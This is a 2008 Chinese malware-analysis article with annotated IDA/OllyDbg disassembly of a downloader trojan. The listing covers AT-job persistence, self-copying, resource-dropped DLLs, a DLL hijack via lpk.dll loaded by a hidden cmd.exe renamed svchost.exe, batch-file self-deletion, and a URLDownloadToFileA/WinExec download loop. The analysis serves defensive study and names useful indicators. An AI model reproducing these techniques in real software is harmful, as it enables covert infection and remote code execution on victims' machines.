分析一个简单的DLL劫持下载者
【文章标题】分析一个简单的DLL劫持下载者【文章作者】ZzAge
【文章目标】某个下载者
【相关工具】ida,ollydbg
【作者 Q Q】85400516
【作者邮箱】zzage@163.com
【作者主页】http://hi.baidu.com/zzage
【文章日期】2008年12月01日
一 创建互斥体（名为 "exe"）——单实例检查：若随后 GetLastError 返回 0B7h（ERROR_ALREADY_EXISTS），说明木马已在运行，函数返回 1
CODE:00404844 push ebx                        ; sub_404844: single-instance check via a named mutex (looks Delphi-compiled; unconfirmed)
CODE:00404845 push offset Name ; lpName //'exe'   ; mutex name "exe" -- usable as a runtime IOC
CODE:0040484A push 0FFFFFFFFh ; int           ; bInitialOwner = -1 (TRUE)
CODE:0040484C push 0 ; lpMutexAttributes      ; no security attributes
CODE:0040484E call sub_403EC4 // IDA's operand labels match CreateMutexA(lpMutexAttributes, bInitialOwner, lpName); presumably a thin wrapper -- verify. Returned handle is discarded (eax overwritten below), so the mutex lives for the process lifetime
CODE:00404853 call GetLastError_0             ; NOTE(review): checked after the wrapper, not after CreateMutexA itself -- only valid if the wrapper does not touch the last-error value
CODE:00404858 cmp eax, 0B7h                   ; 0B7h = 183 = ERROR_ALREADY_EXISTS
CODE:0040485D jnz short loc_404861
CODE:0040485F mov bl, 1                        ; another instance already holds the mutex -> report "running"
CODE:00404861
CODE:00404861 loc_404861: ; CODE XREF: sub_404844+19j
CODE:00404861 mov eax, ebx                     ; NOTE(review): ebx is never zeroed in this function, so the "not running" result depends on the caller's ebx (low byte) being 0 -- confirm in the caller
CODE:00404863 pop ebx
CODE:00404864 retn
二 取Windows目录
CODE:004041DB push 100h ; uSize               ; 256-byte buffer (excerpt of a routine that begins before this listing)
CODE:004041E0 push ebx ; lpBuffer             ; ebx -> buffer; every path built below is relative to this directory
CODE:004041E1 call GetWindowsDirectoryA       ; return value (length / 0 on failure) is not checked in the visible lines
三 删除计划任务文件 %WINDIR%\Tasks\At1.job（路径由第二步取得的 Windows 目录拼接而来，并非硬编码 C:\WINDOWS）。At1.job 应即第七步用 NetScheduleJobAdd 添加的 AT 任务：木马每次运行先清掉旧任务，再重新添加。
CODE:004041FD mov edx, offset dword_404530//'\tasks\at1.job'   ; NOTE(review): bracketed memory operands were stripped by the forum markup throughout these IDA listings -- a line ending in a bare comma or "ptr" has lost its [..] operand
CODE:00404202 call sub_403760                 ; presumably appends the edx string to the string in eax (same helper is used for every path suffix below)
CODE:00404207 mov eax,                        ; [operand lost] the resulting path string
CODE:0040420A call sub_403840                 ; result goes straight into lpFileName, so this yields a C-string pointer
CODE:0040420F push eax ; lpFileName           ; %WINDIR%\tasks\at1.job -- the AT job that sub_403F84 re-creates later
CODE:00404210 call DeleteFileA
四 把 Windows 目录下的 wsock32x.dll、lpk.dll、avp.exe 的文件属性设置为正常（80h = FILE_ATTRIBUTE_NORMAL，先去掉只读/隐藏/系统属性，否则对只读文件的 DeleteFileA 会失败），然后逐个删除，最后把木马自身（sub_4026F0 以 eax=0 调用，应为取自身路径的例程）复制到 Windows 目录下，新命名为 avp.exe（bFailIfExists=0，已存在则覆盖）。
CODE:0040422C mov edx, offset dword_404548//'\wsock32x.dll'   ; NOTE(review): [..] memory operands were stripped by the forum markup -- lines ending in a bare comma or "ptr" have lost their operand
CODE:00404231 call sub_403760                 ; append suffix to the Windows-dir string (eax = dest string, edx = suffix) -- inferred from usage
CODE:00404236 mov eax,
CODE:00404239 call sub_403840                 ; -> C string for the API call
CODE:0040423E push eax ; lpFileName           ; %WINDIR%\wsock32x.dll (its "push 80h" lies before this excerpt)
CODE:0040423F call SetFileAttributesA
CODE:00404244 push 80h ; dwFileAttributes     ; 80h = FILE_ATTRIBUTE_NORMAL; clears RO/H/S so the DeleteFileA below can succeed -- consumed by the call at 0040426E
CODE:00404249 lea eax,
CODE:0040424C mov edx, ebx                    ; ebx = buffer filled by GetWindowsDirectoryA
CODE:0040424E mov ecx, 101h                   ; 101h = 100h-byte buffer + NUL
CODE:00404253 call sub_403740                 ; presumably builds a string from the buffer (eax = dest, edx = src, ecx = max length)
CODE:00404258 lea eax,
CODE:0040425B mov edx, offset dword_404560 //'\lpk.dll'
CODE:00404260 call sub_403760
CODE:00404265 mov eax,
CODE:00404268 call sub_403840
CODE:0040426D push eax ; lpFileName           ; %WINDIR%\lpk.dll
CODE:0040426E call SetFileAttributesA
CODE:00404273 push 80h ; dwFileAttributes     ; consumed by the call at 0040429D
CODE:00404278 lea eax,
CODE:0040427B mov edx, ebx
CODE:0040427D mov ecx, 101h
CODE:00404282 call sub_403740
CODE:00404287 lea eax,
CODE:0040428A mov edx, offset dword_404574 //'\avp.exe'
CODE:0040428F call sub_403760
CODE:00404294 mov eax,
CODE:00404297 call sub_403840
CODE:0040429C push eax ; lpFileName           ; %WINDIR%\avp.exe
CODE:0040429D call SetFileAttributesA
CODE:004042A2 lea eax,                        ; second pass: same three paths, now DeleteFileA
CODE:004042A5 mov edx, ebx
CODE:004042A7 mov ecx, 101h
CODE:004042AC call sub_403740
CODE:004042B1 lea eax,
CODE:004042B4 mov edx, offset dword_404548 //'\wsock32x.dll'
CODE:004042B9 call sub_403760
CODE:004042BE mov eax,
CODE:004042C1 call sub_403840
CODE:004042C6 push eax ; lpFileName           ; %WINDIR%\wsock32x.dll
CODE:004042C7 call DeleteFileA                ; return values of the three deletes are not tested in the visible lines
CODE:004042CC lea eax,
CODE:004042CF mov edx, ebx
CODE:004042D1 mov ecx, 101h
CODE:004042D6 call sub_403740
CODE:004042DB lea eax,
CODE:004042DE mov edx, offset dword_404560 //'\lpk.dll'
CODE:004042E3 call sub_403760
CODE:004042E8 mov eax,
CODE:004042EB call sub_403840
CODE:004042F0 push eax ; lpFileName           ; %WINDIR%\lpk.dll
CODE:004042F1 call DeleteFileA
CODE:004042F6 lea eax,
CODE:004042F9 mov edx, ebx
CODE:004042FB mov ecx, 101h
CODE:00404300 call sub_403740
CODE:00404305 lea eax,
CODE:00404308 mov edx, offset dword_404574 //'\avp.exe'
CODE:0040430D call sub_403760
CODE:00404312 mov eax,
CODE:00404315 call sub_403840
CODE:0040431A push eax ; lpFileName           ; %WINDIR%\avp.exe
CODE:0040431B call DeleteFileA
CODE:00404320 push 0 ; bFailIfExists          ; consumed by CopyFileA at 0040435A: overwrite if present
CODE:00404322 lea eax,
CODE:00404325 mov edx, ebx
CODE:00404327 mov ecx, 101h
CODE:0040432C call sub_403740
CODE:00404331 lea eax,
CODE:00404334 mov edx, offset dword_404574 //'\avp.exe'
CODE:00404339 call sub_403760
CODE:0040433E mov eax,
CODE:00404341 call sub_403840
CODE:00404346 push eax ; lpNewFileName        ; %WINDIR%\avp.exe
CODE:00404347 lea edx,
CODE:0040434A xor eax, eax
CODE:0040434C call sub_4026F0                 ; eax = 0: presumably a ParamStr(0)-style lookup of the dropper's own path (author: "copies itself") -- unconfirmed
CODE:00404351 mov eax,
CODE:00404354 call sub_403840
CODE:00404359 push eax ; lpExistingFileName   ; own executable
CODE:0040435A call CopyFileA                  ; self -> %WINDIR%\avp.exe (the copy the AT job later re-launches)
五 从自身资源中释放 lpk.dll 和 wsock32x.dll 到 Windows 目录下：资源类型为自定义的 "exefile"，资源名分别为 "LPK" 和 "wsock32x"（sub_4040A8 的参数 eax=资源类型、edx=资源名、ecx=目标路径）。这组资源类型/名称可作为识别该释放器的静态特征。
CODE:00404371 mov edx, offset dword_404560;"\lpk.dll"      ; NOTE(review): [..] memory operands were stripped by the forum markup -- lines ending in a bare comma have lost their operand
CODE:00404376 call sub_403760                             ; -> %WINDIR%\lpk.dll
CODE:0040437B mov ecx,                                    ; [operand lost] ecx = destination path
CODE:0040437E mov edx, offset dword_404588;"LPK"           ; resource name
CODE:00404383 mov eax, offset aExefile ; "exefile"         ; custom resource type -- a good static IOC for the dropper
CODE:00404388 call sub_4040A8 // resource-extraction routine (per author): writes resource (type eax, name edx) to the path in ecx
CODE:0040438D lea eax,
CODE:00404390 mov edx, ebx                                ; ebx = GetWindowsDirectoryA buffer
CODE:00404392 mov ecx, 101h
CODE:00404397 call sub_403740                             ; buffer -> string
CODE:0040439C lea eax,
CODE:0040439F mov edx, offset dword_404548;"wsock32x.dll"
CODE:004043A4 call sub_403760                             ; -> %WINDIR%\wsock32x.dll
CODE:004043A9 mov ecx,                                    ; [operand lost] destination path
CODE:004043AC mov edx, offset aWsock32x ; "wsock32x"       ; resource name
CODE:004043B1 mov eax, offset aExefile ; "exefile"
CODE:004043B6 call sub_4040A8// resource-extraction routine (per author): drops the downloader DLL next to lpk.dll
六 把 system32 目录下的 cmd.exe 复制到 Windows 目录下并命名为 svchost.exe（借用系统进程名伪装），然后把 svchost.exe、avp.exe、wsock32x.dll、lpk.dll 的文件属性设置为 23h（只读|隐藏|系统），最后以 uCmdShow=0（SW_HIDE）WinExec 运行 svchost.exe。这一步是劫持的关键：合法的 cmd.exe 副本从 Windows 目录启动，同目录下事先放好的恶意 lpk.dll 会被它加载（依赖当时系统对 lpk.dll 的搜索顺序，新版本 Windows 对此已有调整）。
CODE:004043BB push 0 ; bFailIfExists          ; consumed by CopyFileA at 00404407 (overwrite). NOTE(review): [..] operands were stripped by the forum markup on lines ending in a bare comma
CODE:004043BD lea eax,
CODE:004043C0 mov edx, ebx                    ; ebx = GetWindowsDirectoryA buffer
CODE:004043C2 mov ecx, 101h
CODE:004043C7 call sub_403740                 ; buffer -> string
CODE:004043CC lea eax,
CODE:004043CF mov edx, offset dword_4045B8 ;"\svchost.exe"   ; new name mimics the system process
CODE:004043D4 call sub_403760
CODE:004043D9 mov eax,
CODE:004043DC call sub_403840                 ; -> C string
CODE:004043E1 push eax ; lpNewFileName        ; %WINDIR%\svchost.exe
CODE:004043E2 lea eax,
CODE:004043E5 mov edx, ebx
CODE:004043E7 mov ecx, 101h
CODE:004043EC call sub_403740
CODE:004043F1 lea eax,
CODE:004043F4 mov edx, offset aSystem32Cmd_ex ; "\\system32\\cmd.exe"   ; appended to the Windows dir
CODE:004043F9 call sub_403760
CODE:004043FE mov eax,
CODE:00404401 call sub_403840
CODE:00404406 push eax ; lpExistingFileName   ; %WINDIR%\system32\cmd.exe
CODE:00404407 call CopyFileA                  ; a genuine cmd.exe becomes %WINDIR%\svchost.exe -- the host process that will pick up the planted lpk.dll (per author)
CODE:0040440C push 23h ; dwFileAttributes     ; 23h = READONLY(1)|HIDDEN(2)|SYSTEM(20h); consumed by the call at 00404433
CODE:0040440E lea eax,
CODE:00404411 mov edx, ebx
CODE:00404413 mov ecx, 101h
CODE:00404418 call sub_403740
CODE:0040441D lea eax,
CODE:00404420 mov edx, offset dword_4045B8 ;"\svchost.exe"
CODE:00404425 call sub_403760
CODE:0040442A mov eax,
CODE:0040442D call sub_403840
CODE:00404432 push eax ; lpFileName           ; %WINDIR%\svchost.exe
CODE:00404433 call SetFileAttributesA
CODE:00404438 push 23h ; dwFileAttributes     ; consumed by the call at 0040445F
CODE:0040443A lea eax,
CODE:0040443D mov edx, ebx
CODE:0040443F mov ecx, 101h
CODE:00404444 call sub_403740
CODE:00404449 lea eax,
CODE:0040444C mov edx, offset dword_404574;"\avp.exe"
CODE:00404451 call sub_403760
CODE:00404456 mov eax,
CODE:00404459 call sub_403840
CODE:0040445E push eax ; lpFileName           ; %WINDIR%\avp.exe
CODE:0040445F call SetFileAttributesA
CODE:00404464 push 23h ; dwFileAttributes     ; consumed by the call at 0040448B
CODE:00404466 lea eax,
CODE:00404469 mov edx, ebx
CODE:0040446B mov ecx, 101h
CODE:00404470 call sub_403740
CODE:00404475 lea eax,
CODE:00404478 mov edx, offset dword_404548;"\wsock32x.dll"
CODE:0040447D call sub_403760
CODE:00404482 mov eax,
CODE:00404485 call sub_403840
CODE:0040448A push eax ; lpFileName           ; %WINDIR%\wsock32x.dll
CODE:0040448B call SetFileAttributesA
CODE:00404490 push 23h ; dwFileAttributes     ; consumed by the call at 004044B7
CODE:00404492 lea eax,
CODE:00404495 mov edx, ebx
CODE:00404497 mov ecx, 101h
CODE:0040449C call sub_403740
CODE:004044A1 lea eax,
CODE:004044A4 mov edx, offset dword_404560;"\lpk.dll"
CODE:004044A9 call sub_403760
CODE:004044AE mov eax,
CODE:004044B1 call sub_403840
CODE:004044B6 push eax ; lpFileName           ; %WINDIR%\lpk.dll
CODE:004044B7 call SetFileAttributesA
CODE:004044BC push 0 ; uCmdShow               ; 0 = SW_HIDE; consumed by WinExec at 004044E3
CODE:004044BE lea eax,
CODE:004044C1 mov edx, ebx
CODE:004044C3 mov ecx, 101h
CODE:004044C8 call sub_403740
CODE:004044CD lea eax,
CODE:004044D0 mov edx, offset dword_4045B8;"\svchost.exe"
CODE:004044D5 call sub_403760
CODE:004044DA mov eax,
CODE:004044DD call sub_403840
CODE:004044E2 push eax ; lpCmdLine            ; %WINDIR%\svchost.exe (the renamed cmd.exe)
CODE:004044E3 call WinExec                    ; starts the host hidden; the DLL hijack (lpk.dll -> wsock32x.dll) happens inside that process
七 调用 NetScheduleJobAdd 为 %WINDIR%\avp.exe 添加一个 AT 计划任务（即第三步删除的 At1.job），达到指定时间重新运行木马的目的。注意返回值只做了 test 就被 xor eax,eax 丢弃，添加失败（例如权限不足或 Task Scheduler 服务未运行）时不会有任何处理。
CODE:00403F84 push ebp                        ; sub_403F84: registers an AT job that re-launches %WINDIR%\avp.exe (looks Delphi-compiled: try/finally frame via fs:[eax]; unconfirmed)
CODE:00403F85 mov ebp, esp                    ; NOTE(review): [..] memory operands were stripped by the forum markup -- lines ending in a bare comma or "ptr" have lost their operand
CODE:00403F87 add esp, 0FFFFFEF0h             ; = sub esp, 110h (locals)
CODE:00403F8D push ebx
CODE:00403F8E push esi
CODE:00403F8F xor eax, eax
CODE:00403F91 mov , eax                       ; zero two string locals so the finally block can release them safely
CODE:00403F97 mov , eax
CODE:00403F9A xor eax, eax                    ; eax = 0 for the fs:[eax] accesses below
CODE:00403F9C push ebp                        ; push exception frame: handler loc_404048, previous frame from fs:[0]
CODE:00403F9D push offset loc_404048
CODE:00403FA2 push dword ptr fs:              ; fs:[eax] = fs:[0]
CODE:00403FA5 mov fs:, esp
CODE:00403FA8 push 100h ; uSize
CODE:00403FAD lea eax,
CODE:00403FB3 push eax ; lpBuffer
CODE:00403FB4 call GetWindowsDirectoryA       ; same 256-byte buffer pattern as the main routine; result not checked
CODE:00403FB9 lea eax,
CODE:00403FBC lea edx,
CODE:00403FC2 mov ecx, 101h
CODE:00403FC7 call sub_4039D0                 ; buffer -> string (same role as sub_403740 elsewhere; unconfirmed)
CODE:00403FCC mov eax, 10h                    ; 10h = 16 bytes = sizeof(AT_INFO) on 32-bit Windows
CODE:00403FD1 call sub_4024A0                 ; presumably heap allocation (GetMem-like); esi -> AT_INFO
CODE:00403FD6 mov esi, eax
CODE:00403FD8 mov eax, 4
CODE:00403FDD call sub_4024A0                 ; second, 4-byte allocation; its use is not visible (operand lost)
CODE:00403FE2 mov , eax                       ; 3-byte encoding -> stored to a local via [ebp+disp8]
CODE:00403FE5 mov dword ptr , 9               ; 6-byte encoding fits "mov dword ptr [reg], 9" with no displacement, e.g. [esi] = AT_INFO.JobTime (ms after midnight) -- verify
CODE:00403FEB xor eax, eax
CODE:00403FED mov , eax                       ; further field writes (operands lost); dword 0 then byte 0 would fit DaysOfMonth / DaysOfWeek -- verify
CODE:00403FF0 mov byte ptr , 0
CODE:00403FF4 lea eax,
CODE:00403FFA mov ecx, offset aAvp_exe ; "\\avp.exe"
CODE:00403FFF mov edx,                        ; [operand lost] the Windows-dir string
CODE:00404002 call sub_403A04                 ; eax = edx + ecx -> "%WINDIR%\avp.exe" (the dropped copy of the trojan)
CODE:00404007 mov eax,
CODE:0040400D call sub_4039E8                 ; AT_INFO.Command is LPWSTR, so this presumably converts the command string to wide -- verify
CODE:00404012 mov , eax
CODE:00404015 mov byte ptr , 1                ; byte field = 1; AT_INFO.Flags = JOB_RUN_PERIODICALLY (1) would fit, but the operand is lost -- verify
CODE:00404019 lea eax,
CODE:0040401C push eax ; JobId                ; out: job id (-> %WINDIR%\Tasks\At<JobId>.job)
CODE:0040401D push esi ; Buffer               ; AT_INFO*
CODE:0040401E push 0 ; Servername             ; NULL = local machine
CODE:00404020 call NetScheduleJobAdd          ; normally requires administrative rights and a running Task Scheduler service
CODE:00404025 test eax, eax                   ; NOTE(review): status is tested and then immediately discarded by the xor below -- no conditional jump in between, so failure is silently ignored
CODE:00404027 xor eax, eax
CODE:00404029 pop edx                         ; unwind the exception frame
CODE:0040402A pop ecx
CODE:0040402B pop ecx
CODE:0040402C mov fs:, edx                    ; fs:[eax] with eax = 0
CODE:0040402F push offset loc_40404F          ; continuation address: the finally block's retn "returns" there
CODE:00404034
CODE:00404034 loc_404034: ; CODE XREF: sub_403F84+C9j   ; finally block (also reached from the exception handler)
CODE:00404034 lea eax,
CODE:0040403A call sub_403908                 ; release the two string locals (presumably)
CODE:0040403F lea eax,
CODE:00404042 call sub_403908
CODE:00404047 retn
八 创建一个批处理 c:\Deleteme.bat（路径硬编码在 C 盘根目录，是一个现成的取证线索），然后调用 CreateProcessA（dwCreationFlags=40h 即 IDLE_PRIORITY_CLASS）运行批处理删除自身，成功后关闭返回的进程/线程句柄。由于批处理是异步启动的，自删除只有在木马进程退出后才能完成。整个木马 EXE 的流程就这样，比较简单~
CODE:004045E4 push ebp                        ; sub_4045E4: writes c:\Deleteme.bat and launches it to delete the dropper (per author)
CODE:004045E5 mov ebp, esp                    ; NOTE(review): [..] memory operands were stripped by the forum markup -- lines ending in a bare comma or "push"/"ptr" have lost their operand
CODE:004045E7 add esp, 0FFFFFDCCh             ; = sub esp, 234h (locals: text-file record, STARTUPINFOA, PROCESS_INFORMATION, strings)
CODE:004045ED xor edx, edx
CODE:004045EF mov , edx                       ; zero five string locals so the finally block can release them safely
CODE:004045F5 mov , edx
CODE:004045FB mov , edx
CODE:00404601 mov , edx
CODE:00404607 mov , edx
CODE:0040460A xor eax, eax                    ; eax = 0 for fs:[eax]
CODE:0040460C push ebp                        ; exception frame: handler loc_4047BD
CODE:0040460D push offset loc_4047BD
CODE:00404612 push dword ptr fs:              ; fs:[0]
CODE:00404615 mov fs:, esp
CODE:00404618 nop                             ; 5 x nop, push/pop eax, nop: pure filler; purpose not determinable here (possibly hand-inserted padding)
CODE:00404619 nop
CODE:0040461A nop
CODE:0040461B nop
CODE:0040461C nop
CODE:0040461D push eax
CODE:0040461E pop eax
CODE:0040461F nop
CODE:00404620 lea eax,
CODE:00404623 mov edx, offset aCDeleteme_bat ; "c:\\Deleteme.bat"   ; hard-coded drive-root path: useful forensic artifact
CODE:00404628 call sub_40369C                 ; text-file helpers follow (assign / rewrite / write / close); exact mapping unconfirmed
CODE:0040462D mov edx,
CODE:00404630 lea eax,
CODE:00404636 call sub_402A0C
CODE:0040463B lea eax,
CODE:00404641 call sub_4027A8
CODE:00404646 call sub_402594                 ; called after every file operation: presumably an I/O-result check
CODE:0040464B mov edx, offset dword_4047E8    ; batch line 1 (string contents are not shown in the article)
CODE:00404650 lea eax,
CODE:00404656 call sub_4038B0                 ; write string
CODE:0040465B call sub_402D28                 ; end of line (presumably)
CODE:00404660 call sub_402594
CODE:00404665 push offset dword_4047F8        ; batch line 2 = prefix + own path + suffix
CODE:0040466A lea edx,
CODE:00404670 xor eax, eax
CODE:00404672 call sub_4026F0                 ; eax = 0: same own-path lookup used for CopyFileA in the main routine (unconfirmed)
CODE:00404677 push                            ; [operand lost] the own-path string
CODE:0040467D push offset dword_404808
CODE:00404682 lea eax,
CODE:00404688 mov edx, 3                      ; concatenate the 3 pushed parts
CODE:0040468D call sub_4037A4
CODE:00404692 mov edx,
CODE:00404698 lea eax,
CODE:0040469E call sub_4038B0
CODE:004046A3 call sub_402D28
CODE:004046A8 call sub_402594
CODE:004046AD push offset dword_404814        ; batch line 3 = 4 parts, again including the own path
CODE:004046B2 lea edx,
CODE:004046B8 xor eax, eax
CODE:004046BA call sub_4026F0
CODE:004046BF push
CODE:004046C5 push offset dword_404808
CODE:004046CA push offset dword_404828
CODE:004046CF lea eax,
CODE:004046D5 mov edx, 4                      ; concatenate the 4 pushed parts
CODE:004046DA call sub_4037A4
CODE:004046DF mov edx,
CODE:004046E5 lea eax,
CODE:004046EB call sub_4038B0
CODE:004046F0 call sub_402D28
CODE:004046F5 call sub_402594
CODE:004046FA mov edx, offset dword_40483C    ; batch line 4
CODE:004046FF lea eax,
CODE:00404705 call sub_4038B0
CODE:0040470A call sub_402D28
CODE:0040470F call sub_402594
CODE:00404714 lea eax,
CODE:0040471A call sub_402AC8                 ; close the batch file before launching it
CODE:0040471F call sub_402594
CODE:00404724 lea eax,
CODE:0040472A xor ecx, ecx
CODE:0040472C mov edx, 44h                    ; 44h = sizeof(STARTUPINFOA); zero-fill (presumably FillChar-like)
CODE:00404731 call sub_402B20
CODE:00404736 mov , 1                         ; 10-byte dword store, then 9-byte word store: dwFlags = STARTF_USESHOWWINDOW (1) and wShowWindow = SW_HIDE (0) would fit -- operands lost, verify
CODE:00404740 mov , 0
CODE:00404749 lea eax,
CODE:0040474F push eax ; lpProcessInformation
CODE:00404750 lea eax,
CODE:00404756 push eax ; lpStartupInfo
CODE:00404757 push 0 ; lpCurrentDirectory
CODE:00404759 push 0 ; lpEnvironment
CODE:0040475B push 40h ; dwCreationFlags      ; 40h = IDLE_PRIORITY_CLASS
CODE:0040475D push 0 ; bInheritHandles
CODE:0040475F push 0 ; lpThreadAttributes
CODE:00404761 push 0 ; lpProcessAttributes
CODE:00404763 mov eax,
CODE:00404766 call sub_403840                 ; -> C string
CODE:0040476B push eax ; lpCommandLine        ; the batch file path itself is the command line
CODE:0040476C push 0 ; lpApplicationName
CODE:0040476E call CreateProcessA             ; batch runs detached; the dropper must exit before its self-delete can succeed
CODE:00404773 test eax, eax
CODE:00404775 jz short loc_40478F             ; on failure nothing is reported; handles were never filled
CODE:00404777 mov eax,
CODE:0040477D push eax ; hObject
CODE:0040477E call CloseHandle_0              ; close both PROCESS_INFORMATION handles
CODE:00404783 mov eax,
CODE:00404789 push eax ; hObject
CODE:0040478A call CloseHandle_0
CODE:0040478F
CODE:0040478F loc_40478F: ; CODE XREF: sub_4045E4+191j
CODE:0040478F nop                             ; same do-nothing filler as at function entry
CODE:00404790 nop
CODE:00404791 nop
CODE:00404792 nop
CODE:00404793 nop
CODE:00404794 push eax
CODE:00404795 pop eax
CODE:00404796 nop
CODE:00404797 xor eax, eax
CODE:00404799 pop edx                         ; unwind the exception frame
CODE:0040479A pop ecx
CODE:0040479B pop ecx
CODE:0040479C mov fs:, edx                    ; fs:[eax] with eax = 0
CODE:0040479F push offset loc_4047C4          ; continuation address; finally block follows
CODE:004047A4
CODE:004047A4 loc_4047A4: ; CODE XREF: sub_4045E4+1DEj   ; finally block
CODE:004047A4 lea eax,
CODE:004047AA mov edx, 4                      ; release 4 string locals (presumably)
CODE:004047AF call sub_403628
CODE:004047B4 lea eax,
CODE:004047B7 call sub_403604                 ; release the remaining local (presumably)
CODE:004047BC retn
LPK.dll的程序流程
一 创建线程（应为 DllMain 中的代码；注意地址前缀为 .data，即 IDA 把这段代码放在名为 .data 的节中）
.data:10001253 push esi                        ; DllMain fragment (begins before this excerpt); the ".data" prefix means IDA placed this code in a section named .data -- an unusual layout
.data:10001254 jnz short loc_10001294         ; flag set before the excerpt (likely a fdwReason test -- unconfirmed); the thread is created only on the fall-through path
.data:10001256 push 0 ; lpThreadId
.data:10001258 push 0 ; dwCreationFlags
.data:1000125A push 0 ; lpParameter
.data:1000125C push offset StartAddress ; lpStartAddress   ; thread body -- see the LoadLibraryA("wsock32x.dll") routine listed below
.data:10001261 push 0 ; dwStackSize
.data:10001263 push 0 ; lpThreadAttributes
.data:10001265 call CreateThread               ; the returned thread handle is neither saved nor closed in the visible code
.data:1000126B push ; hLibModule                ; [operand lost by forum markup] the DLL's own module handle
.data:1000126F call DisableThreadLibraryCalls    ; no further DLL_THREAD_ATTACH/DETACH callbacks
二 线程函数：加载 wsock32x.dll（retn 4 表明这是带单个 stdcall 参数的例程，应即上面 CreateThread 的 StartAddress；在工作线程而非 DllMain 中调用 LoadLibraryA，推测是为了避开加载器锁）
.data:1000123D push offset LibFileName ; "wsock32x.dll"   ; thread routine: retn 4 = one stdcall argument, matching a ThreadProc; presumably StartAddress -- unconfirmed
.data:10001242 call LoadLibraryA               ; bare name, resolved by the normal search order; the dropper placed the file in %WINDIR% next to the renamed cmd.exe. Done on a worker thread rather than inside DllMain (likely to avoid LoadLibrary under the loader lock)
.data:10001248 push 1                          ; return 1; the module handle in eax is discarded, so load failure is not detectable here
.data:1000124A pop eax
.data:1000124B retn 4
wsock32x.dll的程序流程
一 下载过程（配置 URL 存放在全局变量 [3E92A8] 中，本文未给出其内容）：先把远程 txt 下载为 %TEMP%\gk_drf.txt，逐行读取其中的 URL，依次下载为 %TEMP%\<序号>.exe 并用 WinExec 隐藏运行；下载结果和 API 返回值都未做任何校验。
003E841E .55 push ebp                          ; fragment of the downloader routine in wsock32x.dll (entry lies before this excerpt); try/finally frame -- assumes eax = 0 here, set before the excerpt
003E841F .68 45863E00 push 003E8645            ; handler address
003E8424 .64:FF30 push dword ptr fs:           ; bytes 64 FF 30 = push dword ptr fs:[eax]. NOTE(review): [..] operands were stripped by the forum markup; where lost they are decoded from the opcode bytes in the comments below
003E8427 .64:8920 mov dword ptr fs:, esp       ; = mov fs:[eax], esp
003E842A .68 54863E00 push 003E8654 ; /urlmon.dll
003E842F .E8 C8C7FFFF call <jmp.&kernel32.LoadLibraryA> ; \LoadLibraryA   ; explicit load of urlmon.dll before URLDownloadToFileA
003E8434 .6A 00 push 0                         ; lpfnCB = NULL
003E8436 .6A 00 push 0                         ; dwReserved = 0
003E8438 .8D95 24FEFFFF lea edx, dword ptr     ; = lea edx, [ebp-1DC]
003E843E .B8 01000000 mov eax, 1
003E8443 .E8 60FFFFFF call 003E83A8 ; temp-folder path -> [ebp-1DC] (per author; eax = 1 selects it)
003E8448 .8D85 24FEFFFF lea eax, dword ptr     ; = lea eax, [ebp-1DC]
003E844E .BA 68863E00 mov edx, 003E8668 ; "gk_drf.txt" appended -> %TEMP%\gk_drf.txt (file-name IOC)
003E8453 .E8 38BAFFFF call 003E3E90            ; string append (eax += edx), inferred from usage
003E8458 .8B85 24FEFFFF mov eax, dword ptr     ; = mov eax, [ebp-1DC]
003E845E .E8 FDBAFFFF call 003E3F60            ; -> C string (result is passed as szFileName)
003E8463 .50 push eax                          ; szFileName
003E8464 .A1 A8923E00 mov eax, dword ptr       ; = mov eax, [3E92A8]: global holding the config URL -- the article never shows its value
003E8469 .50 push eax                          ; szURL
003E846A 6A 00 push 0                          ; pCaller = NULL
003E846C E8 EBFEFFFF call <jmp.&URLMON.URLDownloadToFileA> ; download the remote txt (URL list) to %TEMP%\gk_drf.txt; HRESULT not checked in the visible code
003E8471 .6A FF push -1 ; /Alertable = TRUE
003E8473 .68 C8000000 push 0C8 ; |Timeout = 200. ms
003E8478 .E8 87C7FFFF call <jmp.&kernel32.SleepEx> ; \SleepEx   ; alertable 200 ms pause (lets queued APCs run)
003E847D .33C0 xor eax, eax
003E847F .55 push ebp                          ; nested try frame (handler 003E8610)
003E8480 .68 10863E00 push 003E8610
003E8485 .64:FF30 push dword ptr fs:           ; = push fs:[eax]
003E8488 .64:8920 mov dword ptr fs:, esp       ; = mov fs:[eax], esp
003E848B .8D95 20FEFFFF lea edx, dword ptr     ; = lea edx, [ebp-1E0]
003E8491 .B8 01000000 mov eax, 1
003E8496 .E8 0DFFFFFF call 003E83A8 ; temp-folder path again -> [ebp-1E0]
003E849B .8D85 20FEFFFF lea eax, dword ptr     ; = lea eax, [ebp-1E0]
003E84A1 .BA 68863E00 mov edx, 003E8668 ; "gk_drf.txt"
003E84A6 .E8 E5B9FFFF call 003E3E90
003E84AB .8B95 20FEFFFF mov edx, dword ptr     ; = mov edx, [ebp-1E0] (file name)
003E84B1 .8D85 28FEFFFF lea eax, dword ptr     ; = lea eax, [ebp-1D8] (receives the loaded list)
003E84B7 .E8 BCA4FFFF call 003E2978 ; load the downloaded txt into a string list (per author: one download URL per line)
003E84BC .8D85 28FEFFFF lea eax, dword ptr     ; = lea eax, [ebp-1D8]
003E84C2 .E8 4DA2FFFF call 003E2714            ; purpose not visible here
003E84C7 .E8 60A1FFFF call 003E262C            ; follows several helper calls -- presumably an error/exception check
003E84CC .33C0 xor eax, eax
003E84CE .8945 FC mov dword ptr , eax          ; = mov [ebp-4], eax : loop counter i = 0
003E84D1 .E9 08010000 jmp 003E85DE             ; jump to the loop condition at 003E85DE (outside this excerpt)
003E84D6 >FF45 FC inc dword ptr                ; = inc [ebp-4] : i++ (jump target; whether index 0 is ever used depends on the condition block)
003E84D9 .8D55 F4 lea edx, dword ptr           ; = lea edx, [ebp-0C]
003E84DC .8D85 28FEFFFF lea eax, dword ptr     ; = lea eax, [ebp-1D8]
003E84E2 .E8 31A7FFFF call 003E2C18            ; fetch an item from the list into [ebp-0C] (by usage; index source not visible)
003E84E7 .8D85 28FEFFFF lea eax, dword ptr     ; = lea eax, [ebp-1D8]
003E84ED .E8 92A7FFFF call 003E2C84
003E84F2 .E8 35A1FFFF call 003E262C
003E84F7 .8D45 F8 lea eax, dword ptr           ; = lea eax, [ebp-8]
003E84FA .8B55 F4 mov edx, dword ptr           ; = mov edx, [ebp-0C]
003E84FD .E8 9EB7FFFF call 003E3CA0            ; [ebp-8] = current URL string
003E8502 .33C0 xor eax, eax
003E8504 .55 push ebp                          ; per-iteration try frame (handler 003E85D4)
003E8505 .68 D4853E00 push 003E85D4
003E850A .64:FF30 push dword ptr fs:           ; = push fs:[eax]
